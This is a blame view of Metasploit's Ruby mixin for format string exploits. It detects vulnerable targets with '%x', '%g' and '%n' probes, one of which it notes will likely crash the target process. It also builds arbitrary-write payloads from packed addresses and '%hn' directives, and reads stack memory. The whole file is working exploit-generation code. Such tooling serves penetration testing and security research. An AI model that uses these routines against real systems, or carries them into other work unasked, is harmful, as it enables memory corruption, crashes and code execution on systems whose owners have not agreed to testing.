Files
metasploit-gs/lib/msf/core/exploit/fmtstr.rb
T

285 lines
5.7 KiB
Ruby
Raw Normal View History

# -*- coding: binary -*-
2009-11-17 22:14:44 +00:00
module Msf
###
#
2010-05-26 15:40:12 +00:00
# This mixin provides an interface to generating format string exploits
2009-11-17 22:14:44 +00:00
# in a more intelligent way.
#
# Author: jduck
# $Id$
###
module Exploit::FormatString
#
# Creates an instance of a format string exploit
#
def initialize(info = {})
super
2010-09-26 21:02:00 +00:00
@use_fpu = false
@use_dpa = false
2009-11-17 22:14:44 +00:00
end
2010-09-26 21:02:00 +00:00
#
# Allow caller to override the capabilities
#
def fmtstr_set_caps(fpu, dpa)
@use_fpu = fpu
@use_dpa = dpa
end
2010-09-26 21:02:00 +00:00
#
# Detect the capabilities (only works for non-blind)
#
def fmtstr_detect_caps
@use_dpa = fmtstr_detect_cap_dpa
@use_fpu = fmtstr_detect_cap_fpu
#print_status("support dpa:#{@use_dpa.to_s}, fpu:#{@use_fpu.to_s}")
end
2010-09-26 21:02:00 +00:00
def fmtstr_detect_cap_dpa
res = trigger_fmt("|%1$08x|")
return nil if not res
res = extract_fmt_output(res)
if res =~ /^\|[0-9a-f]{8}\|$/
return true
end
return false
end
2010-09-26 21:02:00 +00:00
def fmtstr_detect_cap_fpu
res = trigger_fmt("|%g|")
return nil if not res
res = extract_fmt_output(res)
if res =~ /^\|[\-0-9]+\.[0-9]+\|$/
return true
end
return false
end
2010-09-26 21:02:00 +00:00
def fmtstr_detect_vulnerable
res = trigger_fmt("|%08x|")
return false if not res
res = extract_fmt_output(res)
if res =~ /^\|[0-9a-f]{8}\|$/
return true
end
return false
end
2010-09-26 21:02:00 +00:00
2009-12-09 23:53:26 +00:00
# NOTE: This will likely crash the target process
def fmtstr_detect_exploitable
begin
res = trigger_fmt("|" + ("%n" * 16) + "|")
rescue ::Exception
res = nil
end
return true if not res
res = extract_fmt_output(res)
if res =~ /^\|\|$/
return true
end
return false
end
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
#
# Generates a format string that will perform an arbitrary write using
# two separate short values
#
2009-11-17 23:30:17 +00:00
def generate_fmt_two_shorts(num_printed, write_to, write_what, targ = target)
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
arr = Array.new
arr << [ write_what & 0xffff, write_to ]
arr << [ write_what >> 16, write_to + 2 ]
2010-09-26 21:02:00 +00:00
2009-11-17 23:30:17 +00:00
stuff = fmtstr_gen_from_array(num_printed, arr, targ)
2009-11-17 22:14:44 +00:00
end
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
#
# Generates a format string that will perform an arbitrary write using
# two separate short values
#
2009-11-17 23:30:17 +00:00
def generate_fmtstr_from_buf(num_printed, write_to, buffer, targ = target)
2010-09-26 21:02:00 +00:00
2009-12-03 20:58:07 +00:00
# break buffer into shorts
arr = fmtstr_gen_array_from_buf(write_to, buffer, targ)
2010-09-26 21:02:00 +00:00
2009-12-03 20:58:07 +00:00
# now build the format string in its entirety
stuff = fmtstr_gen_from_array(num_printed, arr, targ)
end
2010-09-26 21:02:00 +00:00
2009-12-03 20:58:07 +00:00
#
# Generates and returns an array of what/where pairs from the supplied buffer
#
def fmtstr_gen_array_from_buf(write_to, buffer, targ = target)
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
# break buffer into shorts
arr = Array.new
off = 0
if ((buffer.length % 2) == 1)
buffer << rand_text(1)
end
while off < buffer.length
# convert short to number
tb = buffer[off,2].unpack('v')[0].to_i
#print_status("%d %d %d" % [off,buffer.length,tb])
2009-12-03 20:58:07 +00:00
addr = write_to + off
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
arr << [ tb, addr ]
off += 2
end
2009-12-03 20:58:07 +00:00
return arr
2009-11-17 22:14:44 +00:00
end
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
#
# Generates a format string from an array of value/address pairs
#
2009-11-17 23:30:17 +00:00
def fmtstr_gen_from_array(num_printed, arr, targ = target)
2009-12-04 07:45:08 +00:00
num_pops = targ['NumPops']
num_pad = targ['PadBytes'] || 0
2009-11-17 22:14:44 +00:00
# sort the array -- for optimization
arr = arr.sort { |x,y| x[0] <=> y[0] }
2010-09-26 21:02:00 +00:00
# build up the addrs and fmts buffers
2009-11-17 22:14:44 +00:00
fmts = ""
2009-12-04 07:45:08 +00:00
addrs = ""
num = fmtstr_count_printed(num_printed, num_pad, num_pops, arr)
arr.each do |el|
# find out how much to advance the column value
prec = fmtstr_target_short(el[0], num)
2010-09-26 21:02:00 +00:00
# for non-dpa, if the prec is more than 8, we need something to pop
if not @use_dpa and prec >= 8
addrs << rand_text(4)
2009-12-08 23:50:02 +00:00
end
2010-09-26 21:02:00 +00:00
# write here!
addrs << [el[1]].pack('V')
2010-09-26 21:02:00 +00:00
# put our advancement fmt (or bytes)
fmts << fmtstr_advance_count(prec)
2010-09-26 21:02:00 +00:00
# fmt to cause the write :)
if @use_dpa
fmts << "%" + num_pops.to_s + "$hn"
num_pops += 1
else
2009-12-08 23:50:02 +00:00
fmts << "%hn"
2009-11-17 22:14:44 +00:00
end
2010-09-26 21:02:00 +00:00
# update written count
num = el[0]
2009-11-17 22:14:44 +00:00
end
2010-09-26 21:02:00 +00:00
2009-12-08 23:50:02 +00:00
# make sure we dont have bad characters ...
if (bad_idx = Rex::Text.badchar_index(addrs, payload_badchars))
2009-11-17 22:14:44 +00:00
raise BadcharError.new(addrs, bad_idx, addrs.length, addrs[bad_idx]),
"The format string address area contains invalid characters.",
caller
end
# put it all together
2009-12-04 07:45:08 +00:00
stuff = rand_text(num_pad)
2009-11-18 00:50:44 +00:00
stuff << addrs
if not @use_dpa
2009-12-08 23:50:02 +00:00
stuff << "%8x" * num_pops
end
2009-11-17 22:14:44 +00:00
stuff << fmts
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
return stuff
end
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
#
2009-12-04 07:45:08 +00:00
# Count how many bytes will print before we reach the writing..
2009-11-17 22:14:44 +00:00
#
def fmtstr_count_printed(num_printed, num_pad, num_pops, arr)
2010-09-26 21:02:00 +00:00
2009-12-08 23:50:02 +00:00
num = num_printed + num_pad
if not @use_dpa
2009-12-08 23:50:02 +00:00
num += (8 * num_pops)
end
2009-12-04 07:45:08 +00:00
npr = num
arr.each do |el|
prec = fmtstr_target_short(el[0], npr)
2009-12-08 23:50:02 +00:00
# this gets popped in order to advance the column (dpa doesn't need these)
2009-12-09 22:37:34 +00:00
if not @use_dpa and prec >= 8
2009-12-08 23:50:02 +00:00
num += 4
end
2010-09-26 21:02:00 +00:00
2009-12-08 23:50:02 +00:00
# account for the addr to write to
2009-12-04 07:45:08 +00:00
num += 4
npr = el[0]
2009-11-17 22:14:44 +00:00
end
2009-12-04 07:45:08 +00:00
return num
2009-11-17 22:14:44 +00:00
end
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
#
2009-12-09 22:37:34 +00:00
# Generate the number to be used for precision that will create
2009-11-17 22:14:44 +00:00
# the specified value to write
2010-09-26 21:02:00 +00:00
#
2009-11-17 22:14:44 +00:00
def fmtstr_target_short(value, num_printed)
if value < num_printed
return (0x10000 - num_printed) + value
end
return value - num_printed
end
2010-09-26 21:02:00 +00:00
#
2009-12-09 22:37:34 +00:00
# Generate a fmt that will advance the printed count by the specified amount
#
def fmtstr_advance_count(prec)
2010-09-26 21:02:00 +00:00
# no need to advance :)
return "" if prec == 0
2010-09-26 21:02:00 +00:00
# asumming %x max normal length is 8...
if prec >= 8
return "%0" + prec.to_s + "x"
end
2010-09-26 21:02:00 +00:00
# anything else, we just put some chars in...
return rand_text(prec)
end
2010-09-26 21:02:00 +00:00
#
2009-12-09 22:37:34 +00:00
# Read a single 32-bit integer from the stack at the specified offset
#
def fmtstr_stack_read(offset, extra = '')
# cant read offset 0!
return nil if offset < 1
2010-09-26 21:02:00 +00:00
fmt = ''
fmt << extra
if @use_dpa
fmt << "|%" + offset.to_s + "$x"
else
x = offset
if @use_fpu and x >= 2
fmt << "%g" * (x/2)
x %= 2;
end
fmt << "%x" * (x-1)
fmt << "|"
fmt << "%x"
end
2010-09-26 21:02:00 +00:00
res = trigger_fmt(fmt)
return res if not res
2010-09-26 21:02:00 +00:00
numstr = extract_fmt_output(res)
dw = numstr.split('|')[1].to_i(16)
end
2010-09-26 21:02:00 +00:00
2009-11-17 22:14:44 +00:00
end
2009-12-08 23:50:02 +00:00
end